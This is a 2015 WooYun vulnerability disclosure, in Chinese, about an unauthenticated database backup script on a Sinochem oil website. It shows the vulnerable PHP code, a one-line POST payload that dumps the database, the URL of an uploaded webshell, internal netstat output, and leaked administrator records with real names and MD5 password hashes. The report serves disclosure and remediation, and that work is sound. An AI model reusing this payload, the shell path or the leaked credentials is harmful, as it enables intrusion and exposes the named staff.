当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124626

漏洞标题:从中石化主站数据库文件任意下载(数十万数据泄露)到Getshell(漫游内网)各个分站同时沦陷(安全是一个整体呀)

相关厂商:中国石油化工股份有限公司

漏洞作者: Mr.Q

提交时间:2015-07-05 10:47

修复时间:2015-08-23 15:38

公开时间:2015-08-23 15:38

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-05: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

中石化数据库文件任意下载(数十万数据泄露)导致登陆管理员后台Getshell(可漫游内网)
安全是一个整体

详细说明:

中国中化集团公司(以下简称“中化集团”)是中国四大国家石油公司之一,中化石油是中化集团石油业务经营管理的主要载体之一。依托六十多年从事石油业务积累的雄厚基础,中化石油充分发挥在国内外市场拥有的资源、渠道和运作优势,积极提供经济社会发展所需的石油资源,并参与国家战略石油储备体系建设,已成为中国石油安全供应体系的重要成员。

QQ20150704-1@2x.png


问题出现在该处:

http://www.sinochemoil.com/esbclient/database/datebase_back.php


代码如下:

if($_POST['_task']=='doDataBackup'){
global $DBCfg,$config;
/* $conn=@mysql_pconnect($DBCfg['server'],$DBCfg['user'],$DBCfg['pass']);
mysql_select_db($DBCfg['database'],$conn);*/
$tables=array();
$a=0;
$conn=@mysql_pconnect($DBCfg['server'],$DBCfg['user'],$DBCfg['pass']);
mysql_select_db($DBCfg['database'],$conn);
//....
$saveto = $_POST["location"];
$back_mode = 'all';
// 定义数据保存的文件名
$local_filename=$prefix.date('Y_m_d_H-i-s').".sql";
$filename = "../../db/back/".$prefix.date('Y_m_d_H-i-s').".sql"; // 保存在服务器上的文件名
if($saveto == "local"){
//...
header ("Content-Disposition: attachment; filename=$local_filename");
echo $sqldump;
exit;
}
if($saveto == "server"){
//...
}
}


可见只要提交如下:

并post提交:
_task=doDataBackup&location=local


即可下载数据库文件

QQ20150705-1@2x.png


数十万数据:

QQ20150704-2@2x.png


QQ20150704-4@2x.png


发现此主站有大量分站:

QQ20150705-2@2x.png


数据库各种管理员数据:

QQ20150704-3@2x.png


超级管理员,md5解密之:

U9G@DBL(O3`VGMACCY(Q$H3.png


QQ20150704-7@2x.png


Getshell
shell:

http://www.sinochemoil.com/file/upload/2015/07/05/1436273514.PHP


QQ20150705-3@2x.png


可漫游内网:

QQ20150705-4@2x.png


3389开着:

TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING
TCP 10.6.22.2:80 61.153.219.214:10765 ESTABLISHED
TCP 10.6.22.2:80 61.153.219.214:34917 ESTABLISHED
TCP 10.6.22.2:80 61.153.219.214:37650 ESTABLISHED
TCP 10.6.22.2:80 61.153.219.214:54544 ESTABLISHED
TCP 10.6.22.2:80 61.153.219.214:57965 ESTABLISHED
TCP 10.6.22.2:80 61.153.219.214:58851 ESTABLISHED
TCP 10.6.22.2:80 66.249.75.103:41740 ESTABLISHED
TCP 10.6.22.2:80 66.249.75.119:34184 ESTABLISHED
TCP 10.6.22.2:80 175.25.28.41:5891 ESTABLISHED
TCP 10.6.22.2:139 0.0.0.0:0 LISTENING
TCP [::]:80 [::]:0 LISTENING
TCP [::]:135 [::]:0 LISTENING
TCP [::]:445 [::]:0 LISTENING
TCP [::]:3306 [::]:0 LISTENING
TCP [::]:3389 [::]:0 LISTENING
TCP [::]:47001 [::]:0 LISTENING
TCP [::]:49152 [::]:0 LISTENING
TCP [::]:49153 [::]:0 LISTENING
TCP [::]:49154 [::]:0 LISTENING
TCP [::]:49155 [::]:0 LISTENING
TCP [::]:49156 [::]:0 LISTENING
TCP [::]:49157 [::]:0 LISTENING
UDP 0.0.0.0:123 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:4500 *:*
UDP 0.0.0.0:5355 *:*
UDP 10.6.22.2:137 *:*
UDP 10.6.22.2:138 *:*
UDP [::]:123 *:*
UDP [::]:500 *:*
UDP [::]:4500 *:*


QQ20150705-5@2x.png


QQ20150704-6@2x.png


可上大马

QQ20150705-6@2x.png


竟然还有fck,威胁更大啊:

QQ20150704-8@2x.png


因数据库中包含各个分站管理员与密码hash,故可逐一登陆,不再测试

INSERT INTO sys_user VALUES('1','1','0','1','超级管理员','admin','e867d2021a99d801ef254ad958341d60','1','0000-00-00','1','0000-00-00 00:00:00');
INSERT INTO sys_user VALUES('17','13','0','999','肖斌','xiaobin','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-26 13:58:20');
INSERT INTO sys_user VALUES('22','15','0','999','张文舟','zhangwenzhou','1d2aeacbfd1d099b4ab41fa9caf3eae4','1','0000-00-00','1','2013-10-28 10:02:07');
INSERT INTO sys_user VALUES('15','17','0','999','陈涛','chentao','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-26 13:57:39');
INSERT INTO sys_user VALUES('16','12','0','999','张亚非','zhangyafei','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-26 13:58:05');
INSERT INTO sys_user VALUES('14','16','0','999','王雪','wangxue','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-26 13:57:13');
INSERT INTO sys_user VALUES('12','21','0','999','赵伟','zhaowei','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-24 13:34:51');
INSERT INTO sys_user VALUES('13','22','0','999','天津栏目管理员','test','202cb962ac59075b964b07152d234b70','1','0000-00-00','12','2013-10-24 13:48:27');
INSERT INTO sys_user VALUES('24','23','0','999','一级审批人员','check1','202cb962ac59075b964b07152d234b70','1','0000-00-00','12','2013-10-28 10:11:36');
INSERT INTO sys_user VALUES('19','20','0','999','田安涛','tianantao','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-28 09:57:14');
INSERT INTO sys_user VALUES('20','19','0','999','吴朦','wumeng','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-28 09:58:23');
INSERT INTO sys_user VALUES('21','18','0','999','王坚','wangjian','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-28 09:58:58');
INSERT INTO sys_user VALUES('23','14','0','999','殷兵','xuebing','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-28 10:02:39');
INSERT INTO sys_user VALUES('25','23','0','999','二级审批人','check2','202cb962ac59075b964b07152d234b70','1','0000-00-00','12','2013-10-28 10:12:00');
INSERT INTO sys_user VALUES('26','22','0','999','gggg','123','202cb962ac59075b964b07152d234b70','1','0000-00-00','12','2013-10-28 15:14:01');
INSERT INTO sys_user VALUES('28','26','0','999','顾海燕','guhaiyan','202cb962ac59075b964b07152d234b70','1','0000-00-00','15','2013-11-20 15:26:27');
INSERT INTO sys_user VALUES('29','1','0','999','汪光应','wgy','25cd2bede9a2f491f217b8454a6d0d6e','1','0000-00-00','1','2013-12-02 17:45:20');
INSERT INTO sys_user VALUES('30','28','0','999','佟婷婷','tongtt','e10adc3949ba59abbe56e057f20f883e','1','0000-00-00','21','2013-12-25 12:33:34');
INSERT INTO sys_user VALUES('31','15','0','999','徐岭','xuling','e10adc3949ba59abbe56e057f20f883e','1','0000-00-00','22','2014-01-07 16:00:59');
INSERT INTO sys_user VALUES('32','31','0','999','应红枫','yinghongfeng','1d2aeacbfd1d099b4ab41fa9caf3eae4','1','0000-00-00','22','2014-01-08 15:20:20');
INSERT INTO sys_user VALUES('33','33','0','999','李凤云','lifengyun','202cb962ac59075b964b07152d234b70','1','0000-00-00','22','2014-01-08 15:21:26');
INSERT INTO sys_user VALUES('34','34','0','999','曾诚','zengcheng','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2014-01-10 17:22:00');
INSERT INTO sys_user VALUES('36','1','0','999','elongtian','elongtian','85f2a5c45c7ce8b1dee48f9f484a0e49','1','0000-00-00','1','2014-10-20 16:15:25');
INSERT INTO sys_user VALUES('37','1','0','999','迦兰密语','Hacker','e23c1f69ced8de2d94a87fd904357c22','1','0000-00-00','1','2015-01-29 11:15:00'


漏洞证明:

已证明

修复方案:

权限,安全是一个整体,千里之堤毁于蚁穴

版权声明:转载请注明来源 Mr.Q@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-09 15:37

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无